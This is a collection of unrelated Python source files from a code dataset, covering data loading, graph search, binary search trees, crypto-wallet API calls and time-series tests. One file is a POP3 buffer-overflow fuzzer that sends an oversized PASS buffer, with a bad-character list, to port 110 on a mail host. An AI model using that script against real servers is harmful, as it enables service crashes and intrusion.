VOCABULARY_SIZE = len(inverted_index) + 1 # add 1 for the null element
_vids = np.unique(video_dict[:,0])
_num_test_vids = int(round(TEST_RATIO * _vids.shape[0]))
_num_train_vids = _vids.shape[0] - _num_test_vids
if os.path.isfile(VIDEO_FILE):
print('Loading videos from {}...'.format(VIDEO_FILE),end='')
videos = np.load(VIDEO_FILE)
print('done.')
else:
print('Loading videos from {}...'.format(VIDEO_ROOT),end='')
videos = np.array([np.load(fn) for fn in _vids])
print('done.')
print('Saving videos to disk...',end='')
np.save(VIDEO_FILE,videos)
print('done.')
frame_counts = np.array([video.shape[0] for video in videos])
# bimodal train/test splits
train_dict = video_dict[np.where(np.isin(video_dict[:,0],_vids[:_num_train_vids]))]
test_dict = video_dict[np.where(np.isin(video_dict[:,0],_vids[_num_train_vids:]))]
# unimodal train/test splits
train_videos = videos[:_num_train_vids]
test_videos = videos[_num_train_vids:]
train_text = np.unique(train_dict[:,1:].astype(int),axis=0)
test_text = np.unique(test_dict[:,1:].astype(int),axis=0)
def index_to_words(sequences):
'''
Turns a ragged array of word indices into a list of word arrays.
'''
return np.array([np.array([inverted_index[y] for y in x if(y in inverted_index)]) for x in sequences])
def index_to_strings(sequences, sos_included=True):
'''
Turns a ragged array of word indices into a list of strings, removing SOS and EOS.
'''
words = index_to_words(sequences)
strings = []
sos = (0,1)[sos_included]
for arr in words:
eos = (arr.shape[0], np.argmax(arr == 'eos'))['eos' in arr]
s = ' '.join(arr[sos:eos])
strings.append(s)
return np.array(strings)
def get_video(fn):
'''Returns the video corresponding to a filename'''
return videos[np.where(_vids == fn)][0]
if __name__ == '__main__':
# show some data for human validation
import cv2
_bs = 8
_val_dict = video_dict
_val_dict = _val_dict[np.random.permutation(_val_dict.shape[0])] # shuffle
_s = np.random.randint(_val_dict.shape[0]-_bs)
batch = _val_dict[_s:_s+_bs]
_per = 167 // 2
for example in batch:
fn = example[0]
text = example[1:].astype(int)
print(index_to_strings(text[np.newaxis],True)[0])
video = get_video(fn)
for frame in video:
cv2.imshow('video',cv2.resize(frame,(640,380)))
cv2.waitKey(_per)
| StarcoderdataPython |
1930059 | from collections import deque
import sys
read = sys.stdin.readline
n, m, start = map(int, read().split())
v = [[] for _ in range(n + 1)]
for i in range(m):
v1, v2 = map(int, read().split())
v[v1].append(v2)
v[v2].append(v1)
for i in range(n + 1):
v[i].sort()
visited = [False] * (n+1)
res = []
stack = []
stack.append(start)
while stack:
v1 = stack.pop()
if not visited[v1]:
visited[v1] = True
res.append(str(v1))
stack += reversed(v[v1])
print(" ".join(res))
visited = [False] * (n+1)
res = []
queue = deque()
queue.append(start)
while queue:
for _ in range(len(queue)):
v1 = queue.popleft()
if not visited[v1]:
visited[v1] = True
res.append(str(v1))
queue += v[v1]
print(" ".join(res))
| StarcoderdataPython |
383579 | <reponame>HCDM/XRec
from rouge import Rouge
hypothesis = ["the #### transcript is a written version of each day 's cnn student news program use this transcript to help students with reading comprehension and vocabulary use the weekly newsquiz to test your knowledge of storie s yousaw on cnn student news" for i in range(2)]
reference = ["this page includes the show transcript use the transcript to help students with reading comprehension and vocabulary at the bottom of the page , comment for a chance to be mentioned on cnn student news . you must be a teacher or a student age # # or older to request a mention on the cnn student news roll call . the weekly newsquiz tests students ' knowledge of even ts in the news" for i in range(2)]
print("=="*10)
print("hypothesis", " ".join(hypothesis))
print("=="*10)
print("reference", ". ".join(reference))
rouge = Rouge()
scores = rouge.get_scores(hypothesis, reference, avg=True)
print("scores", scores)
print(scores["rouge-1"]["f"]) | StarcoderdataPython |
4903263 | # -*- coding: utf-8 -*-
from collections import OrderedDict
from gluon import current, URL
from gluon.storage import Storage
def config(settings):
"""
SHARE settings for Sri Lanka
@ToDo: Setting for single set of Sectors / Sector Leads Nationally
"""
T = current.T
# PrePopulate data
settings.base.prepopulate += ("SHARE/LK",)
settings.base.prepopulate_demo += ("SHARE/Demo",)
# -------------------------------------------------------------------------
# L10n (Localization) settings
settings.L10n.languages = OrderedDict([
("en-gb", "English"),
("si", "Sinhala"),
("ta", "Tamil"),
])
# Default Language
settings.L10n.default_language = "en-gb"
# Finance settings
settings.fin.currencies = {
#"EUR" : "Euros",
#"GBP" : "Great British Pounds",
"LKR" : "Sri Lanka Rupees",
"USD" : "United States Dollars",
}
settings.fin.currency_default = "USD"
# -------------------------------------------------------------------------
def customise_event_event_resource(r, tablename):
s3db = current.s3db
s3db.event_event.name.label = T("Disaster Title")
# Custom Components
s3db.add_components(tablename,
event_event_name = (# Sinhala
{"name": "name_si",
"joinby": "event_id",
"filterby": {"language": "si",
},
"multiple": False,
},
# Tamil
{"name": "name_ta",
"joinby": "event_id",
"filterby": {"language": "ta",
},
"multiple": False,
},
),
need_need = {"link": "need_event",
"joinby": "event_id",
"key": "need_id",
"actuate": "hide",
"autodelete": False,
},
)
from s3 import S3SQLCustomForm, S3SQLInlineComponent
crud_form = S3SQLCustomForm("name",
S3SQLInlineComponent("name_si",
label = T("Title in Sinhala"),
multiple = False,
fields = [("", "name_l10n")],
),
S3SQLInlineComponent("name_ta",
label = T("Title in Tamil"),
multiple = False,
fields = [("", "name_l10n")],
),
"event_type_id",
"start_date",
"closed",
"end_date",
S3SQLInlineComponent("event_location",
label = T("Locations"),
multiple = False,
fields = [("", "location_id")],
),
"comments",
)
s3db.configure(tablename,
crud_form = crud_form,
)
settings.customise_event_event_resource = customise_event_event_resource
# END =========================================================================
| StarcoderdataPython |
390805 | import numpy as np
def rotation_about(axis,angle):
cth = np.cos(np.deg2rad(angle))
sth = np.sin(np.deg2rad(angle))
if axis=='x':
return np.array([[1,0,0],[0,cth,-sth],[0,sth,cth]])
elif axis=='y':
return np.array([[cth,0,-sth],[0,1,0],[sth,0,cth]])
elif axis=='z':
return np.array([[cth,-sth,0],[sth,cth,0],[0,0,1]])
else:
raise ValueError('Unrecognised axis')
def rotation_list(rots):
R = np.eye(3)
for ax,ang in rots:
R = rotation_about(ax,ang).dot(R)
return R | StarcoderdataPython |
11305299 | # import libraries
import pandas as pd
import matplotlib.pyplot as plt
from statsmodels.graphics.tsaplots import plot_acf, plot_pacf
from statsmodels.tsa.stattools import adfuller, kpss
from statsmodels.tools.sm_exceptions import InterpolationWarning
import warnings
# settings
warnings.filterwarnings('ignore', '.*output shape of zoom.*')
warnings.simplefilter(action='ignore', category=InterpolationWarning)
plt.style.use('seaborn')
def adf_test(x):
'''
Function for performing the Augmented Dickey-Fuller test for stationarity
Null Hypothesis: time series is not stationary
Alternate Hypothesis: time series is stationary
Parameters
----------
x : pd.Series / np.array
The time series to be checked for stationarity
Returns
-------
results: pd.DataFrame
A DataFrame with the ADF test's results
'''
indices = ['Test Statistic', 'p-value',
'# of Lags Used', '# of Observations Used']
adf_test = adfuller(x, autolag='AIC')
results = pd.Series(adf_test[0:4], index=indices)
for key, value in adf_test[4].items():
results[f'Critical Value ({key})'] = value
return results
def kpss_test(x, h0_type='c'):
'''
Function for performing the Kwiatkowski-Phillips-Schmidt-Shin test for stationarity
Null Hypothesis: time series is stationary
Alternate Hypothesis: time series is not stationary
Parameters
----------
x: pd.Series / np.array
The time series to be checked for stationarity
h0_type: str{'c', 'ct'}
Indicates the null hypothesis of the KPSS test:
* 'c': The data is stationary around a constant(default)
* 'ct': The data is stationary around a trend
Returns
-------
results: pd.DataFrame
A DataFrame with the KPSS test's results
'''
indices = ['Test Statistic', 'p-value', '# of Lags']
kpss_test = kpss(x, regression=h0_type)
results = pd.Series(kpss_test[0:3], index=indices)
for key, value in kpss_test[3].items():
results[f'Critical Value ({key})'] = value
return results
def test_autocorrelation(x, n_lags=40, alpha=0.05, h0_type='c'):
'''
Function for testing the stationarity of a series by using:
* the ADF test
* the KPSS test
* ACF/PACF plots
Parameters
----------
x: pd.Series / np.array
The time series to be checked for stationarity
n_lags : int
The number of lags for the ACF/PACF plots
alpha : float
Significance level for the ACF/PACF plots
h0_type: str{'c', 'ct'}
Indicates the null hypothesis of the KPSS test:
* 'c': The data is stationary around a constant(default)
* 'ct': The data is stationary around a trend
Returns
-------
fig : matplotlib.figure.Figure
Figure containing the ACF/PACF plot
'''
adf_results = adf_test(x)
kpss_results = kpss_test(x, h0_type=h0_type)
print('ADF test statistic: {:.2f} (p-val: {:.2f})'.format(adf_results['Test Statistic'],
adf_results['p-value']))
print('KPSS test statistic: {:.2f} (p-val: {:.2f})'.format(kpss_results['Test Statistic'],
kpss_results['p-value']))
fig, ax = plt.subplots(2, figsize=(16, 8))
plot_acf(x, ax=ax[0], lags=n_lags, alpha=alpha)
plot_pacf(x, ax=ax[1], lags=n_lags, alpha=alpha)
return fig
| StarcoderdataPython |
1793526 | from setuptools import setup, find_packages
setup(
name='pyexpert',
packages=find_packages(exclude=['tests']),
version='0.0.1',
description='A small prolog implementation for embedded expert systems',
long_description=open('README.md').read(),
keywords=['prolog'],
install_requires=['arpeggio'],
license='MIT'
)
| StarcoderdataPython |
9605031 | '''
BINARY SEARCH TREE
* The left subtree of a node contains only nodes with keys lesser than the node’s key.
* The right subtree of a node contains only nodes with keys greater than the node’s key.
* The left and right subtree each must also be a binary search tree.
* There must be no duplicate nodes.
'''
class Node:
def __init__(self, key):
self.left = None
self.right = None
self.val = key
'''
SEARCH
[RUNTIME] O(logn)
'''
def search(root, key):
# base case - root is none or base case at root
if root is None or root.val == key:
return root
# key is smaller
if key < root.val:
return search(root.left, key)
# o/w key greater
return search(root.right, key)
def searchIterative(root, key):
curr = root
parent = None
if root is None:
return root
while curr:
parent = curr
if curr.val == key:
return curr
if key < curr.val:
curr = curr.left
else:
curr = curr.right
return curr
'''
INSERT
* start at root
* recurse on left if val of node < root or right if >
* when reach leaf node, insert at either left/right side
[RUNTIME] O(logn)
'''
# [INSERTION] traverse from root to leaf (new node always inserted as leaf node)
def insert(root, key):
# base case - always if root is None
if root is None:
return Node(key)
# o/w recurse & insert at either left/right
if root.val < key:
root.right = insert(root.right, key)
else:
root.left = insert(root.left, key)
return root
def insertIterative(root, key):
curr = root
parent = None # store parent of curr node
# base case - root is None
if root is None:
# if tree is empty, create new node and set as root
return Node(key)
while curr:
parent = curr
if curr.val < key:
curr = curr.right
else:
curr = curr.left
# assign new Node to left/right child of leaf
print(key)
node = Node(key)
if parent.val < key:
parent.right = node
else:
parent.left = node
return root
'''
DELETE
3 possibilities arise when deleting a node
1. Node to be deleted is the leaf
simply remove the node
2. Node to be deleted only has one child
Remove node and replace it with its child
3. Node to be deleted has two children
Find inorder successor/predecessor of the node and
copy content and delete the inorder successor/pred
[RUNTIME] O(logn) --> skewed BST O(n)
'''
def deleteNode(root, key):
# first we need to find the actual node to be deleted
# base case
if root is None:
return root
if key < root.val:
# key lies in left subtree
root.left = deleteNode(root.left, key)
return root
elif key > root.val:
# key lies in right subtree
root.right = deleteNode(root.right, key)
return root
else:
# key is same as root, found node to be deleted
# ****** If node has 1 child or no children
if root.right is None:
temp = root.left
root = None # Needed to unreference this memory, is this really needed?
return temp
if root.left is None:
temp = root.right
root = None # Needed to unreference this memory, is this really needed?
return temp
# ****** o/w node has 2 children
# inorder successor - smallest in right subtree
# NOTE: track the parent of successor to AVOID recursive call to delete successor
# NOTE: Successor/Predecessor won't always be a LEAF NODE
# find the successor
parent = root
succ = root.right
while succ.left is not None:
parent = succ
succ = succ.left
if parent != root:
# succ will be leftmost, assign succ.right to parent.left
parent.left = succ.right
else:
# immediate right of root is succ
parent.right = succ.right
# COPY succ data to root
root.val = succ.val
return root
def findSucc(root):
# ASSUME: root has 2 children
curr = root.right
while curr.left is not None:
parent = curr
curr = curr.left
return parent, curr
def deleteNodeIterative(root, key):
# search for node to be deleted
curr = root
while curr is not None:
parent = curr
if key < curr.val:
curr = curr.left
elif key > curr.val:
curr = curr.right
else:
break
if curr is None:
return root
# o/w found node to be deleted
# CASE: node has 1 or 0 children
if curr.left is None:
temp = curr.right
curr = None
if parent.right is curr:
parent.right = temp
else:
parent.left = temp
elif curr.right is None:
temp = curr.left
curr = None
if parent.right is curr:
parent.right = temp
else:
parent.left = temp
else:
# CASE: node has 2 children, find inorder successor
succParent, succ = findSucc(curr)
# if succ is immediate curr.right
if succParent is curr:
succParent.right = succ.right
else:
# succ will be leftmost, assign succ.right TO parent.left
succParent.left = succ.right
# cpy succ data to curr
curr.val = succ.val
return root
'''
INORDER Traversal
'''
def inorder(root):
if root is None:
return
inorder(root.left)
print(root.val, ',', end="")
inorder(root.right)
# DRIVER CODE
keys = [15, 10, 20, 8, 12, 16, 25]
root = None
for key in keys:
root = insertIterative(root, key)
print('search BST:', search(root, 25).val)
print('searchIterative 25 BST:', searchIterative(root, 25).val)
print('delete node(25) from BST...', )
deleteNode(root, 25)
print('searchIterative 25 BST:', searchIterative(root, 25))
print('deleteNodeIterative node(15) from BST...', )
deleteNodeIterative(root, 15)
print('searchIterative 15 BST:', searchIterative(root, 25))
print('inorder traversal:')
inorder(root)
'''
ADVANTAGES of BST over HASH TABLES
* We can get all keys in sorted order by just doing Inorder Traversal of BST. This is not a natural operation in Hash Tables and requires extra efforts.
* Doing order statistics, finding closest lower and greater elements, doing range queries are easy to do with BSTs. Like sorting, these operations
are not a natural operation with Hash Tables.
* BSTs are easy to implement compared to hashing, we can easily implement our own customized BST. To implement Hashing, we generally rely on libraries provided by programming languages.
* With Self-Balancing BSTs, all operations are guaranteed to work in O(Logn) time. But with Hashing, Θ(1) is average time and some particular operations may be costly,
especially when table resizing happens.
''' | StarcoderdataPython |
132994 | <gh_stars>1-10
import torch
from random import randint, gauss
def get_device():
return torch.device("cuda:{}".format(randint(0, torch.cuda.device_count() - 1)) if torch.cuda.is_available() else "cpu")
class OrnsteinUhlenbeckProcess(object):
# Ornstein–Uhlenbeck process
def __init__(self, dt=1, theta=.15, sigma=1, nums=1):
self.x = [0] * nums
self.dt = dt
self.theta = theta
self.sigma = sigma
self.nums = nums
def __call__(self):
dx = [-self.theta * self.x[i] * self.dt + gauss(0, self.sigma) for i in range(self.nums)]
self.x = [self.x[i] + dx[i] for i in range(self.nums)]
return self.x
def reset(self):
self.x = [0] * self.nums
def copy(source, destination):
destination.load_state_dict(source.state_dict())
def tau_move_average(source, destination, tau=0.1):
d_dict = destination.state_dict()
s_dict = source.state_dict()
for key in d_dict:
d_dict[key] = s_dict[key] * tau + d_dict[key] * (1 - tau)
destination.load_state_dict(d_dict)
| StarcoderdataPython |
3528962 | <filename>polecat/model/defaults.py
from polecat.utils.proxy import Proxy
default_blueprint = Proxy('polecat.model.blueprint.Blueprint')
| StarcoderdataPython |
4862274 | <gh_stars>1-10
import requests
from decimal import Decimal
from datetime import datetime
from collections import defaultdict
import os
ETHERSCAN_KEY = os.environ["ETHERSCAN_KEY"]
def erc20_address_call(address):
"""API call to etherscan for an ethereum wallet
and returns the total positive count of remaining erc-20 coins
in the wallet"""
address = str(address)
url = "http://api.etherscan.io/api?module=account&action=tokentx&address=" + address + \
"&startblock=0&endblock=999999999&sort=asc&apikey=" + ETHERSCAN_KEY
eth_token_totals = defaultdict(lambda : 0)
positive_count_eth = defaultdict(lambda : 0)
transactions_in = defaultdict(lambda : 0)
transactions_out = defaultdict(lambda : 0)
client_response = defaultdict(lambda : 0)
response = requests.get(url)
address_content = response.json()
result = address_content.get("result")
# print(address, "**************************************************")
for transaction in result:
hash = transaction.get("hash")
tx_from = transaction.get("from")
tx_to = transaction.get("to")
value = int(transaction.get("value"))
decimals = int(transaction.get("tokenDecimal"))
token_name = transaction.get("tokenName")
token_symbol = transaction.get("tokenSymbol")
confirmations = transaction.get("confirmations")
epc_time = int(transaction.get("timeStamp"))
date = datetime.utcfromtimestamp(epc_time)
real_value = value * 10 ** (decimals * -1)
if tx_to == address.lower():
eth_token_totals[token_symbol] += real_value
transactions_in[token_symbol] += real_value
else:
eth_token_totals[token_symbol] += (real_value * -1)
transactions_out[token_symbol] += (real_value * -1)
for k, v in eth_token_totals.items():
if v >= 0:
positive_count_eth[k] += v
client_response['eth_coins'] = positive_count_eth
client_response['tx_in'] = transactions_in
client_response['tx_out'] = transactions_out
print('*************', positive_count_eth)
return client_response
def btc_address_call(address):
"""API call to blockchain.info for bitcoin wallets
returns the total amount of remaining bitcoin, if positive"""
address = str(address)
url = "https://blockchain.info/rawaddr/" + address
btc_token_totals = defaultdict(lambda : 0)
response = requests.get(url)
btc_balance = response.json()
balance = btc_balance.get("final_balance")
total_received = btc_balance.get("total_received")
total_sent = btc_balance.get("total_sent")
btc_decimal = int(balance) * 10 **(-8)
received = int(total_received) * 10 **(-8)
sent = int(total_sent) * 10 **(-8)
btc_token_totals['BTC'] += float(btc_decimal)
btc_token_totals['tx_in'] = received
btc_token_totals['tx_out'] = sent
return btc_token_totals
def erc20_value_search(coins):
"""An API call to Binance for coin converstion rates"""
url2 = "http://api.binance.com/api/v3/ticker/price"
response2 = requests.get(url2)
rate_list = response2.json()
pair_conversions = defaultdict(lambda : 0)
for coin in coins:
for rate in rate_list:
exchange_coin = rate['symbol']
exchange_price = rate['price']
if coin + 'ETH' == exchange_coin:
pair_conversions[exchange_coin] = exchange_price
else:
pass
return pair_conversions
def btc_eth_toUSD():
"""An API call to cryptocompare.com for BTC and ETH conversions to USD"""
url = "https://min-api.cryptocompare.com/data/pricemulti?fsyms=BTC,ETH&tsyms=USD"
response = requests.get(url)
btceth_usd = response.json()
return btceth_usd
| StarcoderdataPython |
1955846 | <filename>5_18.py
"""Descrição:Programa que leia os valores indicados e imprima a quantidade de notas necessárias para pagar este valor
tabalhar com notas de 50, 20, 10, 5, 1. Neste caso incluir a nota de 100
Autor:<NAME>
Data:
Versão: 001
"""
# Declaração de variáveis
valor = int(0)
apagar = int(0)
cédulas = int(0)
# Entrada de dados
valor = int(input("Digite o valor a pagar:"))
cédulas = 0
atual = 100
apagar = valor
# Processamento e saída de dados
while True:
if atual <= apagar:
apagar -= atual
cédulas += 1
else:
print("%d cédula(s) de R$%d" % (cédulas, atual))
if apagar == 0:
break
if atual ==100:
atual = 50
if atual == 50:
atual = 20
elif atual == 20:
atual = 10
elif atual == 10:
atual = 5
elif atual == 5:
atual = 1
cédulas = 0
| StarcoderdataPython |
6645358 | <reponame>zaygeee/MASTER
# coding=utf-8
import hmac
import hashlib
import base64
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
from Crypto.Hash import SHA
from Crypto.Hash import MD5
priKey = '''-----<KEY>'''
class transfer:
def money_format(self, value):
value = "%.2f" % float(value)
components = str(value).split('.')
if len(components) > 1:
left, right = components
right = '.' + right
else:
left, right = components[0], ''
result = ''
while left:
result = left[-3:] + ',' + result
left = left[:-3]
return result.strip(',') + right
def rounding_up(self, value):
a = int(value/1)
b = value%1
if b > 0:
a = a + 1
return a
def sign(self, signdate):
h=MD5.new(signdate)
signer = PKCS1_v1_5.new(RSA.importKey(priKey))
signn = signer.sign(h)
signn=base64.urlsafe_b64encode(signn)
return signn
class test(transfer):
pass | StarcoderdataPython |
387019 | #!/usr/bin/env python
"""fuzza autogenerated."""
from __future__ import print_function
import socket
def str2b(data):
"""Unescape P2/P3 and convert to bytes if Python3."""
# Python2: Unescape control chars
try:
return data.decode('string_escape')
except AttributeError:
pass
except UnicodeDecodeError:
pass
# Python3: Unescape control chars and convert to byte
try:
return data.encode("utf-8").decode('unicode-escape').encode("latin1")
except UnicodeDecodeError:
pass
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
len_overflow = 2700 # Use pattern_create.rb and pattern_offset.rb to find exact offset
eip = "B"*4 # Ignore for badchar detection
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
buffer = "A"*len_overflow + eip + badchars
print('Trying to send %s bytes buffer...' % (str(len(buffer))))
try:
s.connect(('mail.example.tld', 110))
s.recv(1024)
s.send(str2b('USER test\r\n'))
s.recv(1024)
s.send(str2b('PASS ' + buffer + '\r\n'))
s.recv(1024)
s.send(str2b('QUIT\r\n'))
print('done')
except:
print('Could not connect')
s.close()
| StarcoderdataPython |
11200104 | <reponame>glpzzz/prognos
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
"""
conditions.py
Copyright 2014 <NAME> <<EMAIL>>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class Locations(object):
"""dealing with malformed XML values"""
def __init__(self):
self.locations = {
u'PINAR DEL RIO': u'Pronóstico Extendido del Tiempo por Ciudades',
u'LA HABANA': u'LA HABANA',
u'VARADERO': u'VARADERO',
u'CIENFUEGOS': u'CIENFUEGOS',
u'CAYO COCO': u'CAYO COCO',
u'CAMAGÜEY': u'CAMAGÜEY',
u'HOLGUIN': u'HOLGUIN',
u'SANTIAGO DE CUBA': u'SANTIAGO DE CUBA'}
class WeatherStatus(object):
def __init__(self):
self.weather_status = {
'Lluvias Ocasionales': ':/actions/images/weather-showers-scattered-day.png',
'Lluvias dispersas': ':/actions/images/weather-showers-scattered-day.png',
'Lluvias aisladas': ':/actions/images/weather-showers-scattered-day.png',
'Lluvias en la Tarde': ':/actions/images/weather-showers-scattered-night.png',
'Chubascos': ':/actions/images/weather-showers-day.png',
'Parcialmente Nublado': ':/actions/images/weather-few-clouds.png',
'Nublado': ':/actions/images/weather-many-clouds.png',
'Soleado': ':/actions/images/weather-clear.png',
'Tormentas': ':/actions/images/weather-storm-day.png'}
| StarcoderdataPython |
6698738 | '''
write a sequence of argv[1] normally distributed random numbers with mean argv[2] and std.dev argv[3] into argv[4] (ASCII text file)
Example:
python create_init_distr.py 20 -16.44 0.3 fens.txt
'''
from math import *
import random
import sys #for getting command line args
noe = int(sys.argv[1]) #number of ensemble members
mu = float(sys.argv[2]) #mean of the normal distribution
sig = float(sys.argv[3]) #standard deviation of the normal distribution
f = open(sys.argv[4], 'w') #open the desired text file to write output in there
for i in range(noe):
#r = random.gauss(log10(4e-17), log10(8e-17/4e-17)) #-16.4+-0.3 seems reasonable, 4e-17 is mu, 8e-17 is mu+1sigma
r = random.gauss(mu, sig)
f.write(str(r)+'\n')
f.close()
# DART $Id$
# from <NAME>
#
# <next few lines under version control, do not edit>
# $URL$
# $Revision$
# $Date$
| StarcoderdataPython |
11250271 | <gh_stars>100-1000
__all__ = [
"CNNRegressor",
"FCNRegressor",
"InceptionTimeRegressor",
"LSTMRegressor",
"LSTMFCNRegressor",
"EncoderRegressor",
"CNTCRegressor",
"MCDCNNRegressor",
"MLPRegressor",
"ResNetRegressor",
"SimpleRNNRegressor",
"TLENETRegressor",
]
from sktime_dl.regression._cnn import CNNRegressor
from sktime_dl.regression._fcn import FCNRegressor
from sktime_dl.regression._inceptiontime import InceptionTimeRegressor
from sktime_dl.regression._lstm import LSTMRegressor
from sktime_dl.regression._lstmfcn import LSTMFCNRegressor
from sktime_dl.regression._encoder import EncoderRegressor
from sktime_dl.regression._cntc import CNTCRegressor
from sktime_dl.regression._mcdcnn import MCDCNNRegressor
from sktime_dl.regression._mlp import MLPRegressor
from sktime_dl.regression._resnet import ResNetRegressor
from sktime_dl.regression._rnn import SimpleRNNRegressor
from sktime_dl.regression._tlenet import TLENETRegressor
| StarcoderdataPython |
261926 | <filename>conkit/io/tests/test_evfold.py
"""Testing facility for conkit.io.EVfold"""
__author__ = "<NAME>"
__date__ = "26 Oct 2016"
import os
import unittest
from conkit.core.contact import Contact
from conkit.core.contactfile import ContactFile
from conkit.core.contactmap import ContactMap
from conkit.core.sequence import Sequence
from conkit.io.evfold import EVfoldParser
from conkit.io.tests.helpers import ParserTestCase
class TestEVfoldParser(ParserTestCase):
def test_read_1(self):
content = """1 M 2 V 0 0.0338619
1 M 3 G 0 0.0307956
1 M 4 L 0 0.0268079
1 M 5 T 0 0.0219783
1 M 6 T 0 0.0222061
1 M 7 L 0 0.0213079
1 M 8 F 0 0.0119054
1 M 9 W 0 0.0275182
1 M 10 L 0 0.0134577
1 M 11 G 0 0.0234555
"""
f_name = self.tempfile(content=content)
with open(f_name, "r") as f_in:
contact_file = EVfoldParser().read(f_in)
contact_map1 = contact_file.top_map
self.assertEqual(1, len(contact_file))
self.assertEqual(10, len(contact_map1))
self.assertEqual([1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [c.res1_seq for c in contact_map1])
self.assertEqual([2, 3, 4, 5, 6, 7, 8, 9, 10, 11], [c.res2_seq for c in contact_map1])
self.assertEqual(
[
0.0338619,
0.0307956,
0.0268079,
0.0219783,
0.0222061,
0.0213079,
0.0119054,
0.0275182,
0.0134577,
0.0234555,
],
[c.raw_score for c in contact_map1],
)
def test_write_1(self):
contact_file = ContactFile("RR")
contact_file.target = "R9999"
contact_file.author = "<PASSWORD>"
contact_file.remark = ["Predictor remarks"]
contact_file.method = ["Description of methods used", "Description of methods used"]
contact_map = ContactMap("1")
contact_file.add(contact_map)
for c in [(1, 9, 0, 8, 0.7), (1, 10, 0, 8, 0.7), (2, 8, 0, 8, 0.9), (3, 12, 0, 8, 0.4)]:
contact = Contact(c[0], c[1], c[4], distance_bound=(c[2], c[3]))
contact_map.add(contact)
contact_map.sequence = Sequence("1", "HLEGSIGILLKKHEIVFDGCHDFGRTYIWQMSD")
contact_map.set_sequence_register()
f_name = self.tempfile()
with open(f_name, "w") as f_out:
EVfoldParser().write(f_out, contact_file)
content = ["1 H 9 L 0 0.7", "1 H 10 L 0 0.7", "2 L 8 I 0 0.9", "3 E 12 K 0 0.4"]
with open(f_name, "r") as f_in:
output = f_in.read().splitlines()
self.assertEqual(content, output)
if __name__ == "__main__":
unittest.main(verbosity=2)
| StarcoderdataPython |
9724701 | <filename>server/routes/dashboard.py
from pydantic import BaseModel
from fastapi import APIRouter
from fastapi.responses import JSONResponse
import jwt
from config import db, SECRET_KEY
router = APIRouter(prefix='/api')
account_collection = db.get_collection('accounts')
coin_collection = db.get_collection('coins')
class Dashboard(BaseModel):
token: str
@router.post('/dashboard')
async def dashboard(dashboard: Dashboard):
try:
payload = jwt.decode(dashboard.token, SECRET_KEY, algorithms=['HS256'])
account = account_collection.find_one({'_id': payload['_id']})
formatted_coins = []
for coin in coin_collection.find({}):
formatted_coins.append({
'_id': coin['_id'],
'name': coin['name'],
'abbreviation': coin['abbreviation'],
'price': coin['price']
})
return JSONResponse(
{
'message': 'successfully found dashboard data', 'success': True,
'account': {
'balances': account['balances'],
'friends': account['friends'],
'boughtCoins': account['coins']
},
'coins': formatted_coins
},
status_code=200
)
except jwt.exceptions.DecodeError:
return JSONResponse({'message': 'invalid token', 'success': False}, status_code=401)
except jwt.exceptions.ExpiredSignatureError:
return JSONResponse({'message': 'token expired', 'success': False}, status_code=401)
except Exception as e:
return JSONResponse(
{'message': 'unknown error', 'error': str(e), 'success': False}, status_code=500
) | StarcoderdataPython |
305407 | <gh_stars>10-100
from sacrerouge.datasets.chaganty2018.subcommand import Chaganty2018Subcommand
| StarcoderdataPython |
205164 | import numpy as np
import os.path as osp
import random
import mmcv
import cv2
from .custom import CustomDataset
from .extra_aug import ExtraAugmentation
from .registry import DATASETS
from .transforms import (ImageTransform, BboxTransform, MaskTransform,
SegMapTransform, Numpy2Tensor)
from pycocotools.ytvos import YTVOS
from mmcv.parallel import DataContainer as DC
from .utils import to_tensor, random_scale
from .cutblur import CutBlur
from .cutnoise import CutNoise
from .instaboost import InstaBoost
@DATASETS.register_module
class YTVOSDataset(CustomDataset):
CLASSES = ('person', 'giant_panda', 'lizard', 'parrot', 'skateboard', 'sedan',
'ape', 'dog', 'snake', 'monkey', 'hand', 'rabbit', 'duck', 'cat', 'cow', 'fish',
'train', 'horse', 'turtle', 'bear', 'motorbike', 'giraffe', 'leopard',
'fox', 'deer', 'owl', 'surfboard', 'airplane', 'truck', 'zebra', 'tiger',
